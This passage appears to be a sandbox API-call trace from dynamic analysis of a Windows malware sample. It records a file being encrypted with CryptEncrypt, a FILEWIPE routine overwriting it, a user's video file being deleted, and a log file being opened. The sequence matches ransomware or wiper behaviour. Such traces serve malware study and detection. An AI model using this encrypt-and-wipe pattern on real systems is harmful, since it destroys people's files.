lpMsg=0x6ae83c) returned 0 [0042.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.665] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0042.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.665] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.665] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.666] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.666] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.666] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.666] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.667] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14128, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14130) returned 1 [0042.667] CharLowerBuffW (in: lpsz="byte[82225]", cchLength=0xb | out: lpsz="byte[82225]") returned 0xb [0042.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.671] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95d268*, pdwDataLen=0x6ae220*=0x14128, dwBufLen=0x14130 | out: pbData=0x95d268*, pdwDataLen=0x6ae220*=0x14130) returned 1 [0042.674] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.686] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.686] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.686] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0042.689] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.689] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.690] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.690] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0042.690] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.690] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0042.691] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0042.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.691] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebbdb30, ftCreationTime.dwHighDateTime=0x1d5b93c, ftLastAccessTime.dwLowDateTime=0xae7836b0, ftLastAccessTime.dwHighDateTime=0x1d5c186, ftLastWriteTime.dwLowDateTime=0xae7836b0, ftLastWriteTime.dwHighDateTime=0x1d5c186, nFileSizeHigh=0x0, nFileSizeLow=0x14128, dwReserved0=0x0, dwReserved1=0x777648, cFileName="yQGDwWOzy63yZvixsE8A.mp4", cAlternateFileName="YQGDWW~1.MP4")) returned 0x7c2240 [0042.691] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.692] CharLowerBuffW (in: lpsz="byte[82216]", cchLength=0xb | out: lpsz="byte[82216]") returned 0xb [0042.692] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.692] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.692] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.693] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.693] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0042.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.694] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.694] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\yqgdwwozy63yzvixse8a.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0042.695] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.695] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.695] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.696] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.696] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.696] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.696] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.696] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.696] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", lpFilePart=0x0) returned 0x44 [0042.696] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebbdb30, ftCreationTime.dwHighDateTime=0x1d5b93c, ftLastAccessTime.dwLowDateTime=0xae7836b0, ftLastAccessTime.dwHighDateTime=0x1d5c186, ftLastWriteTime.dwLowDateTime=0x192817e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14128, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="yQGDwWOzy63yZvixsE8A.mp4", cAlternateFileName="YQGDWW~1.MP4")) returned 0x7c2240 [0042.696] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\yqgdwwozy63yzvixse8a.mp4")) returned 1 [0042.697] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebbdb30, ftCreationTime.dwHighDateTime=0x1d5b93c, ftLastAccessTime.dwLowDateTime=0xae7836b0, ftLastAccessTime.dwHighDateTime=0x1d5c186, ftLastWriteTime.dwLowDateTime=0x192817e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14128, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="yQGDwWOzy63yZvixsE8A.mp4", cAlternateFileName="YQGDWW~1.MP4")) returned 0 [0042.698] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.698] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.698] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.698] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.698] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.698] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.699] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.699] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.699] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.699] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.699] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 